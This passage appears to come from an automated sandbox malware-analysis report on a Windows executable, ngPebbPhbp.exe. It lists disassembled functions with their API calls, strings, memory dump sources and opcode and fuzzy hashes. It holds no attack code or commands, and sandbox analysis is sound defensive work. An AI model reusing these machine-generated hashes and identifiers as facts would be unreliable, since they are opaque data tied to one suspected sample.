                                                • Instruction Fuzzy Hash: 2C417075E00308AFDF24DBA8E886BEDBBF8EB48314F04449AF501B7391DB7499448B25
                                                APIs
                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\ngPebbPhbp.exe,00000104), ref: 00B2EE6A
                                                • _free.LIBCMT ref: 00B2EF35
                                                • _free.LIBCMT ref: 00B2EF3F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: _free$FileModuleName
                                                • String ID: C:\Users\user\Desktop\ngPebbPhbp.exe
                                                • API String ID: 2506810119-376171749
                                                • Opcode ID: a4b75a7660f85a8df7e7c06483da7154ae9eb6814841de682f47a0760be6fa11
                                                • Instruction ID: c2be0f98bcb5d409d553558efb44c530e0c2bdd159431873e467bc3044469456
                                                • Opcode Fuzzy Hash: a4b75a7660f85a8df7e7c06483da7154ae9eb6814841de682f47a0760be6fa11
                                                • Instruction Fuzzy Hash: 56316371A04268AFDB21EF9AED8199EBBFCEF89310F1440E6F81897211D7709E44CB51
                                                APIs
                                                • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00B29E7B
                                                • _abort.LIBCMT ref: 00B29F86
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: EncodePointer_abort
                                                • String ID: MOC$RCC
                                                • API String ID: 948111806-2084237596
                                                • Opcode ID: 8c20f49deadc697d7651f93a8e83b3e885f5340b4b863a9b0a92da2173c0c462
                                                • Instruction ID: df58cea8b4e6241dde41e73c4934c7eabbe71980b056af4215817917e064c337
                                                • Opcode Fuzzy Hash: 8c20f49deadc697d7651f93a8e83b3e885f5340b4b863a9b0a92da2173c0c462
                                                • Instruction Fuzzy Hash: 77415571900219AFCF15DF98ED81AAEBBB5FF48304F1981A9FA1CA7221D335A950DB50
                                                APIs
                                                • __fprintf_l.LIBCMT ref: 00B1340E
                                                • _strncpy.LIBCMT ref: 00B13459
                                                  • Part of subcall function 00B189ED: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000050,?,00000000,00000000,00B4E088,?,00000007,00B133E2,?,?,00000050,5EA84158), ref: 00B18A0A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                • String ID: $%s$@%s
                                                • API String ID: 562999700-834177443
                                                • Opcode ID: 3dd6f79113dfb0909a4205a925fe36e5f29a26e0ca4776d0b746f84c523d34ba
                                                • Instruction ID: 0446b9d17dbaab48c48fbd8148504adba63e640bff7959ba9c6092f8006eb8a8
                                                • Opcode Fuzzy Hash: 3dd6f79113dfb0909a4205a925fe36e5f29a26e0ca4776d0b746f84c523d34ba
                                                • Instruction Fuzzy Hash: B8218F72500709ABDB10DEA8DC81EEE7BE8FB04700F5405A5FA14D7291EB31EA958B60
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 00B1F8F7
                                                  • Part of subcall function 00B01E44: GetDlgItem.USER32(00000000,00003021), ref: 00B01E88
                                                  • Part of subcall function 00B01E44: SetWindowTextW.USER32(00000000,00B3C6C8), ref: 00B01E9E
                                                • EndDialog.USER32(?,00000001), ref: 00B1F99F
                                                • SetDlgItemTextW.USER32(?,00000066,00000000), ref: 00B1F9E1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: ItemText$DialogH_prolog3_Window
                                                • String ID: ASKNEXTVOL
                                                • API String ID: 2321058237-3402441367
                                                • Opcode ID: 1bc9363c6d7ac3fec6018aebbe0604440630b959bb7eaf270f188ca8e3188263
                                                • Instruction ID: 1ca21c600590edcff1668905a79620d6aa14d0b41f3e0f10be132285f8ce61a7
                                                • Opcode Fuzzy Hash: 1bc9363c6d7ac3fec6018aebbe0604440630b959bb7eaf270f188ca8e3188263
                                                • Instruction Fuzzy Hash: 06214A31641205BFDB24EBA8CC5AFED37E8EB0A341F5004A5F541AB2A5C631DA44CB21
                                                APIs
                                                • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00B0FEBD,00000008,00000004,00B12D42,?,?,?,?,00000000,00B1ABB6,?), ref: 00B17484
                                                • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00B0FEBD,00000008,00000004,00B12D42,?,?,?,?,00000000), ref: 00B1748E
                                                • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00B0FEBD,00000008,00000004,00B12D42,?,?,?,?,00000000), ref: 00B1749E
                                                Strings
                                                • Thread pool initialization failed., xrefs: 00B174B6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                • String ID: Thread pool initialization failed.
                                                • API String ID: 3340455307-2182114853
                                                • Opcode ID: 2063c73185f7624ab86a5edbea09e690fb9e4fee5112b979e1e0736ad0b2afde
                                                • Instruction ID: 3e303faf327b47be52a474a2df60da1e4aa4d2e54d62947556fa53a4d9e35d91
                                                • Opcode Fuzzy Hash: 2063c73185f7624ab86a5edbea09e690fb9e4fee5112b979e1e0736ad0b2afde
                                                • Instruction Fuzzy Hash: 631191B1644709ABD3219F669CC49E7FFECEB54744F60086EF1DAC3300DAB059808B60
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RENAMEDLG$REPLACEFILEDLG
                                                • API String ID: 0-56093855
                                                • Opcode ID: e39979c1648c6324f261c944a5115c0b5927773a852ad4507359010a30bdec23
                                                • Instruction ID: 0856ae6b34eb1744d00ab268d26c3e1ce52028fa2586dd202addddb99fa0d693
                                                • Opcode Fuzzy Hash: e39979c1648c6324f261c944a5115c0b5927773a852ad4507359010a30bdec23
                                                • Instruction Fuzzy Hash: 0A11AC31304320ABD7218F18FC84A173BE9F749783B0408A9FA4AC3660CB719894DB61
                                                APIs
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00B2A843,00000000,?,00B56150,?,?,?,00B2A9E6,00000004,InitializeCriticalSectionEx,00B3F7F4,InitializeCriticalSectionEx), ref: 00B2A89F
                                                • GetLastError.KERNEL32(?,00B2A843,00000000,?,00B56150,?,?,?,00B2A9E6,00000004,InitializeCriticalSectionEx,00B3F7F4,InitializeCriticalSectionEx,00000000,?,00B2A79D), ref: 00B2A8A9
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00B2A8D1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: LibraryLoad$ErrorLast
                                                • String ID: api-ms-
                                                • API String ID: 3177248105-2084034818
                                                • Opcode ID: 8147e5dcc96d0627dfaea778f663e8ce23d11c87184a0374f603b18f597794a4
                                                • Instruction ID: 4a1bcbb9e3d43283aea2d33edf5b778c2d56cf94345bc79ad84bb6d92144245b
                                                • Opcode Fuzzy Hash: 8147e5dcc96d0627dfaea778f663e8ce23d11c87184a0374f603b18f597794a4
                                                • Instruction Fuzzy Hash: 4BE04F30680215B7EF201BF0FD06B1E3ED9EB10B91F200070FA0DB84E0DB6198119BA6
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: __alldvrm$_strrchr
                                                • String ID:
                                                • API String ID: 1036877536-0
                                                • Opcode ID: 1ec6666d94b4212580304211626675eb5ed9854efa503107affec4ce99a0ac8c
                                                • Instruction ID: 73d8977e6bccd8c43f1a2fafa8e06bdc7a31f9b1153f210159d568d421738791
                                                • Opcode Fuzzy Hash: 1ec6666d94b4212580304211626675eb5ed9854efa503107affec4ce99a0ac8c
                                                • Instruction Fuzzy Hash: CDA14B71A247869FEB11EF2CD8A17AEBBE4EF51350F3442EDE4959B282C6348D41C750
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00B30481,?,00000000,?,00000001,?,?,00000001,00B30481,?), ref: 00B33685
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B3370E
                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00B2DBD1,?), ref: 00B33720
                                                • __freea.LIBCMT ref: 00B33729
                                                  • Part of subcall function 00B3040E: RtlAllocateHeap.NTDLL(00000000,00B2535E,?,?,00B26C16,?,?,?,?,?,00B25269,00B2535E,?,?,?,?), ref: 00B30440
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                • String ID:
                                                • API String ID: 2652629310-0
                                                • Opcode ID: 5015317e9b29cd15f945b6565275b9dfd50855ee9c050c1bd8a04b91aec20d28
                                                • Instruction ID: 5b352eb91fe2ca4afc3f08594afe8d8d2edfa80e076453e71a815958fdca10ee
                                                • Opcode Fuzzy Hash: 5015317e9b29cd15f945b6565275b9dfd50855ee9c050c1bd8a04b91aec20d28
                                                • Instruction Fuzzy Hash: 36319CB2A0021AABDF259F64DC85DAF7BE5EB40750F2401A8EC04E6250EB35CE51CB90
                                                APIs
                                                • __EH_prolog3.LIBCMT ref: 00B162D4
                                                • ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000010), ref: 00B162EB
                                                • ExpandEnvironmentStringsW.KERNEL32(?,?,?,00000000,?,?,?,?,?,00000010), ref: 00B16328
                                                • _wcslen.LIBCMT ref: 00B16338
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: EnvironmentExpandStrings$H_prolog3_wcslen
                                                • String ID:
                                                • API String ID: 3741103063-0
                                                • Opcode ID: 35dc5fbac75ab6275707764f95853dbbd0ba246f11a705138de62bbbc2babe54
                                                • Instruction ID: 97ad0c3726e29b9da6964d29e42bef8068f7dbc55d36655b0be67144b5f2f5ba
                                                • Opcode Fuzzy Hash: 35dc5fbac75ab6275707764f95853dbbd0ba246f11a705138de62bbbc2babe54
                                                • Instruction Fuzzy Hash: A211A0B0A0121AAFDB049FA8AD859FFBBF9FF45310B54019DA421A7280DB349D40CBE4
                                                APIs
                                                • __EH_prolog3.LIBCMT ref: 00B11273
                                                  • Part of subcall function 00B1067E: GetVersionExW.KERNEL32(?), ref: 00B106AF
                                                • FoldStringW.KERNEL32(00000020,?,000000FF,00000000,00000000,0000000C,00B0350C,5EA84180,00000000,?,?,00B043F5,?,?,?,00000000), ref: 00B1129A
                                                • FoldStringW.KERNEL32(00000020,?,000000FF,?,?,00000000), ref: 00B112D4
                                                • _wcslen.LIBCMT ref: 00B112DF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: FoldString$H_prolog3Version_wcslen
                                                • String ID:
                                                • API String ID: 535866816-0
                                                • Opcode ID: 0f1f4376106dfbbad67dc9e56647567b4ca7182cab516923261d8162d71510c8
                                                • Instruction ID: bef83902238457f5e49e978adc52132e0df6a895ee3f20ea18907144499e031e
                                                • Opcode Fuzzy Hash: 0f1f4376106dfbbad67dc9e56647567b4ca7182cab516923261d8162d71510c8
                                                • Instruction Fuzzy Hash: B0119171A11129ABDB049BAD9D499AF7BEDEF05720F200649B920E72D4CB70A98087E5
                                                APIs
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00B3198B,00000000,00000000,00000000,00000000,?,00B31B88,00000006,FlsSetValue), ref: 00B31A16
                                                • GetLastError.KERNEL32(?,00B3198B,00000000,00000000,00000000,00000000,?,00B31B88,00000006,FlsSetValue,00B40DD0,FlsSetValue,00000000,00000364,?,00B300D7), ref: 00B31A22
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00B3198B,00000000,00000000,00000000,00000000,?,00B31B88,00000006,FlsSetValue,00B40DD0,FlsSetValue,00000000), ref: 00B31A30
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: LibraryLoad$ErrorLast
                                                • String ID:
                                                • API String ID: 3177248105-0
                                                • Opcode ID: 250caa6ce7373c426dda9cfd0276514106c77f341d5386d52180e837977ff69f
                                                • Instruction ID: d3878803e1105b73467dfb3ad890eee8b210ff71d8089f4446aa799384f78256
                                                • Opcode Fuzzy Hash: 250caa6ce7373c426dda9cfd0276514106c77f341d5386d52180e837977ff69f
                                                • Instruction Fuzzy Hash: 5E01AC367562269BC7218AAD9C44A577BDCEF457A3F311D64F919E7240DB30D800CBE0
                                                APIs
                                                • __EH_prolog3.LIBCMT ref: 00B11310
                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,00B117FB,?,?,\\?\,5EA84158,?,?,?,00000000,00B3A279,000000FF), ref: 00B11319
                                                • GetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,?,00000000,00B3A279,000000FF), ref: 00B11348
                                                • _wcslen.LIBCMT ref: 00B11351
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory$H_prolog3_wcslen
                                                • String ID:
                                                • API String ID: 19219720-0
                                                • Opcode ID: 241334a645ce9969b29d97469558a9a68e8b688aa1f5ff1946a15183171f6348
                                                • Instruction ID: b4abac00ab7b42612af21e4c7d62fb50b1b7d412d99241e05b8c68cdd0533c5a
                                                • Opcode Fuzzy Hash: 241334a645ce9969b29d97469558a9a68e8b688aa1f5ff1946a15183171f6348
                                                • Instruction Fuzzy Hash: 8D01A272900629BBCB14AFF899458FFBFBDAF81720B100689F615E7285CF34594087E4
                                                APIs
                                                • SleepConditionVariableCS.KERNELBASE(?,00B262BB,00000064), ref: 00B26341
                                                • LeaveCriticalSection.KERNEL32(00B560E0,?,?,00B262BB,00000064,?,?,?,?,00000000,00B3A75D,000000FF), ref: 00B2634B
                                                • WaitForSingleObjectEx.KERNEL32(00000064,00000000,?,00B262BB,00000064,?,?,?,?,00000000,00B3A75D,000000FF), ref: 00B2635C
                                                • EnterCriticalSection.KERNEL32(00B560E0,?,00B262BB,00000064,?,?,?,?,00000000,00B3A75D,000000FF), ref: 00B26363
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                • String ID:
                                                • API String ID: 3269011525-0
                                                • Opcode ID: bb6007622d660c74ba76baf67708e51299a93757ba41c4ac239b43f9bbc1197e
                                                • Instruction ID: 104d0c0aeb43f6b479e94e8e86baacd9c546dbd730786f15079ddfc2e4182667
                                                • Opcode Fuzzy Hash: bb6007622d660c74ba76baf67708e51299a93757ba41c4ac239b43f9bbc1197e
                                                • Instruction Fuzzy Hash: 9AE06D32540274EBC7111B94AC49B9E7F68AB08BA2B5840D0F90AB31A0CB615D149BD8
                                                APIs
                                                • GetDC.USER32(00000000), ref: 00B1EB77
                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 00B1EB86
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B1EB94
                                                • ReleaseDC.USER32(00000000,00000000), ref: 00B1EBA2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: CapsDevice$Release
                                                • String ID:
                                                • API String ID: 1035833867-0
                                                • Opcode ID: 12271a5d4603471ce41ddce07d4672b7727fe09c30bd2cff5bfe57e69c2089bf
                                                • Instruction ID: 0cc1e21fcd1d28be1a5a3fa1ed935d4c8ac36d68f94ecd37d46ec89ceb26c28e
                                                • Opcode Fuzzy Hash: 12271a5d4603471ce41ddce07d4672b7727fe09c30bd2cff5bfe57e69c2089bf
                                                • Instruction Fuzzy Hash: 15E0EC31A8AF20ABD6621B70BD1DB873A94AB19B53F0401C1FA06AB1D0CEA044408B94
                                                APIs
                                                • __Init_thread_footer.LIBCMT ref: 00B18294
                                                  • Part of subcall function 00B014A7: _wcslen.LIBCMT ref: 00B014B8
                                                  • Part of subcall function 00B2087E: __EH_prolog3_GS.LIBCMT ref: 00B20885
                                                  • Part of subcall function 00B2087E: GetLastError.KERNEL32(0000001C,00B18244,?,00000000,00000086,?,5EA84158,?,?,?,?,?,00000000,00B3A75D,000000FF), ref: 00B2089D
                                                  • Part of subcall function 00B2087E: SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,00B3A75D,000000FF), ref: 00B208D6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: ErrorLast$H_prolog3_Init_thread_footer_wcslen
                                                • String ID: %ls
                                                • API String ID: 1279724102-3246610740
                                                • Opcode ID: 91a22f8caa9d25340d781fde790179e7bbcccba4f3cbb6a935826bda8fd2864a
                                                • Instruction ID: 6ad0fa66c22ab07daa731e10814545db6776ec55721d3c284d347873d7a07867
                                                • Opcode Fuzzy Hash: 91a22f8caa9d25340d781fde790179e7bbcccba4f3cbb6a935826bda8fd2864a
                                                • Instruction Fuzzy Hash: 48B1CA70841209EADB24EF94C986EEE7BF1FF15300FA048D9F456261E1DB71AA94DA80
                                                APIs
                                                  • Part of subcall function 00B1EBAA: GetDC.USER32(00000000), ref: 00B1EBAE
                                                  • Part of subcall function 00B1EBAA: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B1EBB9
                                                  • Part of subcall function 00B1EBAA: ReleaseDC.USER32(00000000,00000000), ref: 00B1EBC4
                                                • GetObjectW.GDI32(?,00000018,?), ref: 00B1EF65
                                                  • Part of subcall function 00B1F1EC: GetDC.USER32(00000000), ref: 00B1F1F5
